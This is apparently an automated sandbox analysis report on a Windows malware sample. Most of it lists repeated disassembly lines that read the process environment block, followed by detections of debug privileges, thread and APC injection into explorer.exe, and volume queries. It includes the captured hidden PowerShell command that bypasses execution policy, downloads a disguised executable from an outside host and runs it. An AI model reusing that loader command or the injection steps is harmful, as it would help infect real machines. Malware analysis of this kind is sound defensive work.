Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D9240 mov eax, dword ptr fs:[00000030h] 29_2_012D9240
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h] 29_2_01395A4F
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h] 29_2_01395A4F
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h] 29_2_01395A4F
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01395A4F mov eax, dword ptr fs:[00000030h] 29_2_01395A4F
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130FAB0 mov eax, dword ptr fs:[00000030h] 29_2_0130FAB0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h] 29_2_012D52A5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h] 29_2_012D52A5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h] 29_2_012D52A5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h] 29_2_012D52A5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D52A5 mov eax, dword ptr fs:[00000030h] 29_2_012D52A5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D1AA0 mov eax, dword ptr fs:[00000030h] 29_2_012D1AA0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013012BD mov esi, dword ptr fs:[00000030h] 29_2_013012BD
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013012BD mov eax, dword ptr fs:[00000030h] 29_2_013012BD
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013012BD mov eax, dword ptr fs:[00000030h] 29_2_013012BD
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h] 29_2_012E62A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h] 29_2_012E62A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h] 29_2_012E62A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E62A0 mov eax, dword ptr fs:[00000030h] 29_2_012E62A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01305AA0 mov eax, dword ptr fs:[00000030h] 29_2_01305AA0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01305AA0 mov eax, dword ptr fs:[00000030h] 29_2_01305AA0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EAAB0 mov eax, dword ptr fs:[00000030h] 29_2_012EAAB0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EAAB0 mov eax, dword ptr fs:[00000030h] 29_2_012EAAB0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139129A mov eax, dword ptr fs:[00000030h] 29_2_0139129A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130D294 mov eax, dword ptr fs:[00000030h] 29_2_0130D294
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130D294 mov eax, dword ptr fs:[00000030h] 29_2_0130D294
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130DA88 mov eax, dword ptr fs:[00000030h] 29_2_0130DA88
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130DA88 mov eax, dword ptr fs:[00000030h] 29_2_0130DA88
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h] 29_2_0139B2E8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h] 29_2_0139B2E8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h] 29_2_0139B2E8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139B2E8 mov eax, dword ptr fs:[00000030h] 29_2_0139B2E8
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01302AE4 mov eax, dword ptr fs:[00000030h] 29_2_01302AE4
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01394AEF mov eax, dword ptr fs:[00000030h] 29_2_01394AEF
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D3ACA mov eax, dword ptr fs:[00000030h] 29_2_012D3ACA
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A8ADD mov eax, dword ptr fs:[00000030h] 29_2_013A8ADD
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D5AC0 mov eax, dword ptr fs:[00000030h] 29_2_012D5AC0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D5AC0 mov eax, dword ptr fs:[00000030h] 29_2_012D5AC0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D5AC0 mov eax, dword ptr fs:[00000030h] 29_2_012D5AC0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D12D4 mov eax, dword ptr fs:[00000030h] 29_2_012D12D4
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01302ACB mov eax, dword ptr fs:[00000030h] 29_2_01302ACB
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139E539 mov eax, dword ptr fs:[00000030h] 29_2_0139E539
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0135A537 mov eax, dword ptr fs:[00000030h] 29_2_0135A537
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01304D3B mov eax, dword ptr fs:[00000030h] 29_2_01304D3B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01304D3B mov eax, dword ptr fs:[00000030h] 29_2_01304D3B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01304D3B mov eax, dword ptr fs:[00000030h] 29_2_01304D3B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A8D34 mov eax, dword ptr fs:[00000030h] 29_2_013A8D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130F527 mov eax, dword ptr fs:[00000030h] 29_2_0130F527
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130F527 mov eax, dword ptr fs:[00000030h] 29_2_0130F527
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130F527 mov eax, dword ptr fs:[00000030h] 29_2_0130F527
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012E3D34 mov eax, dword ptr fs:[00000030h] 29_2_012E3D34
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012DAD30 mov eax, dword ptr fs:[00000030h] 29_2_012DAD30
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01393518 mov eax, dword ptr fs:[00000030h] 29_2_01393518
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01393518 mov eax, dword ptr fs:[00000030h] 29_2_01393518
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01393518 mov eax, dword ptr fs:[00000030h] 29_2_01393518
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0137CD04 mov eax, dword ptr fs:[00000030h] 29_2_0137CD04
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D751A mov eax, dword ptr fs:[00000030h] 29_2_012D751A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D751A mov eax, dword ptr fs:[00000030h] 29_2_012D751A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D751A mov eax, dword ptr fs:[00000030h] 29_2_012D751A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D751A mov eax, dword ptr fs:[00000030h] 29_2_012D751A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FC577 mov eax, dword ptr fs:[00000030h] 29_2_012FC577
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012FC577 mov eax, dword ptr fs:[00000030h] 29_2_012FC577
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h] 29_2_012F8D76
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h] 29_2_012F8D76
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h] 29_2_012F8D76
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h] 29_2_012F8D76
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F8D76 mov eax, dword ptr fs:[00000030h] 29_2_012F8D76
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01314D51 mov eax, dword ptr fs:[00000030h] 29_2_01314D51
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01314D51 mov eax, dword ptr fs:[00000030h] 29_2_01314D51
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D354C mov eax, dword ptr fs:[00000030h] 29_2_012D354C
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D354C mov eax, dword ptr fs:[00000030h] 29_2_012D354C
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0138FD52 mov eax, dword ptr fs:[00000030h] 29_2_0138FD52
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01313D43 mov eax, dword ptr fs:[00000030h] 29_2_01313D43
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01353540 mov eax, dword ptr fs:[00000030h] 29_2_01353540
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01383D40 mov eax, dword ptr fs:[00000030h] 29_2_01383D40
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F7D50 mov eax, dword ptr fs:[00000030h] 29_2_012F7D50
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01388D47 mov eax, dword ptr fs:[00000030h] 29_2_01388D47
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01301DB5 mov eax, dword ptr fs:[00000030h] 29_2_01301DB5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01301DB5 mov eax, dword ptr fs:[00000030h] 29_2_01301DB5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01301DB5 mov eax, dword ptr fs:[00000030h] 29_2_01301DB5
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013065A0 mov eax, dword ptr fs:[00000030h] 29_2_013065A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013065A0 mov eax, dword ptr fs:[00000030h] 29_2_013065A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013065A0 mov eax, dword ptr fs:[00000030h] 29_2_013065A0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013035A1 mov eax, dword ptr fs:[00000030h] 29_2_013035A1
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A05AC mov eax, dword ptr fs:[00000030h] 29_2_013A05AC
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A05AC mov eax, dword ptr fs:[00000030h] 29_2_013A05AC
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h] 29_2_012D2D8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h] 29_2_012D2D8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h] 29_2_012D2D8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h] 29_2_012D2D8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D2D8A mov eax, dword ptr fs:[00000030h] 29_2_012D2D8A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130FD9B mov eax, dword ptr fs:[00000030h] 29_2_0130FD9B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130FD9B mov eax, dword ptr fs:[00000030h] 29_2_0130FD9B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01302581 mov eax, dword ptr fs:[00000030h] 29_2_01302581
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01302581 mov eax, dword ptr fs:[00000030h] 29_2_01302581
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01302581 mov eax, dword ptr fs:[00000030h] 29_2_01302581
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01302581 mov eax, dword ptr fs:[00000030h] 29_2_01302581
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h] 29_2_0139B581
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h] 29_2_0139B581
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h] 29_2_0139B581
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139B581 mov eax, dword ptr fs:[00000030h] 29_2_0139B581
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h] 29_2_01392D82
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h] 29_2_01392D82
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h] 29_2_01392D82
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h] 29_2_01392D82
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h] 29_2_01392D82
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h] 29_2_01392D82
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01392D82 mov eax, dword ptr fs:[00000030h] 29_2_01392D82
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D3591 mov eax, dword ptr fs:[00000030h] 29_2_012D3591
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01388DF1 mov eax, dword ptr fs:[00000030h] 29_2_01388DF1
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012ED5E0 mov eax, dword ptr fs:[00000030h] 29_2_012ED5E0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012ED5E0 mov eax, dword ptr fs:[00000030h] 29_2_012ED5E0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h] 29_2_0139FDE2
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h] 29_2_0139FDE2
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h] 29_2_0139FDE2
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0139FDE2 mov eax, dword ptr fs:[00000030h] 29_2_0139FDE2
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013095EC mov eax, dword ptr fs:[00000030h] 29_2_013095EC
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D95F0 mov eax, dword ptr fs:[00000030h] 29_2_012D95F0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D95F0 mov ecx, dword ptr fs:[00000030h] 29_2_012D95F0
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0138FDD3 mov eax, dword ptr fs:[00000030h] 29_2_0138FDD3
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D15C1 mov eax, dword ptr fs:[00000030h] 29_2_012D15C1
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h] 29_2_01356DC9
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h] 29_2_01356DC9
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h] 29_2_01356DC9
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356DC9 mov ecx, dword ptr fs:[00000030h] 29_2_01356DC9
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h] 29_2_01356DC9
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356DC9 mov eax, dword ptr fs:[00000030h] 29_2_01356DC9
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01303C3E mov eax, dword ptr fs:[00000030h] 29_2_01303C3E
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01303C3E mov eax, dword ptr fs:[00000030h] 29_2_01303C3E
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01303C3E mov eax, dword ptr fs:[00000030h] 29_2_01303C3E
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D4439 mov eax, dword ptr fs:[00000030h] 29_2_012D4439
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130BC2C mov eax, dword ptr fs:[00000030h] 29_2_0130BC2C
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EB433 mov eax, dword ptr fs:[00000030h] 29_2_012EB433
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EB433 mov eax, dword ptr fs:[00000030h] 29_2_012EB433
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012EB433 mov eax, dword ptr fs:[00000030h] 29_2_012EB433
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F2430 mov eax, dword ptr fs:[00000030h] 29_2_012F2430
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F2430 mov eax, dword ptr fs:[00000030h] 29_2_012F2430
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A8C14 mov eax, dword ptr fs:[00000030h] 29_2_013A8C14
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A740D mov eax, dword ptr fs:[00000030h] 29_2_013A740D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A740D mov eax, dword ptr fs:[00000030h] 29_2_013A740D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_013A740D mov eax, dword ptr fs:[00000030h] 29_2_013A740D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012D8410 mov eax, dword ptr fs:[00000030h] 29_2_012D8410
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01391C06 mov eax, dword ptr fs:[00000030h] 29_2_01391C06
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h] 29_2_01356C0A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h] 29_2_01356C0A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h] 29_2_01356C0A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01356C0A mov eax, dword ptr fs:[00000030h] 29_2_01356C0A
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_01315C70 mov eax, dword ptr fs:[00000030h] 29_2_01315C70
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_012F746D mov eax, dword ptr fs:[00000030h] 29_2_012F746D
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h] 29_2_0130AC7B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h] 29_2_0130AC7B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h] 29_2_0130AC7B
Source: C:\Users\Public\oftmhayq.exe Code function: 29_2_0130AC7B mov eax, dword ptr fs:[00000030h] 29_2_0130AC7B
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug
Source: C:\Users\Public\oftmhayq.exe Process token adjusted: Debug
Source: C:\Users\Public\oftmhayq.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

Bypasses PowerShell execution policy
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ' & { iwr http://sparepartiran.com/js/2Q/5901777.pdf.exe -OutFile C:\Users\Public\oftmhayq.exe}; & {Start-Process -FilePath 'C:\Users\Public\oftmhayq.exe'}'
Injects a PE file into a foreign processes
Source: C:\Users\Public\oftmhayq.exe Memory written: C:\Users\Public\oftmhayq.exe base: 400000 value starts with: 4D5A
Maps a DLL or memory area into another process
Source: C:\Users\Public\oftmhayq.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\oftmhayq.exe Thread register set: target process: 3388
Queues an APC in another process (thread injection)
Source: C:\Users\Public\oftmhayq.exe Thread APC queued: target process: C:\Windows\explorer.exe
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\oftmhayq.exe 'C:\Users\Public\oftmhayq.exe'
Source: C:\Users\Public\oftmhayq.exe Process created: C:\Users\Public\oftmhayq.exe C:\Users\Public\oftmhayq.exe
Source: explorer.exe, 0000001F.00000002.530564683.0000000001980000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: explorer.exe, 0000001F.00000000.506248785.0000000006860000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000001F.00000002.530564683.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progman
Source: explorer.exe, 0000001F.00000002.530564683.0000000001980000.00000002.00000001.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Users\Public\oftmhayq.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\Public\oftmhayq.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
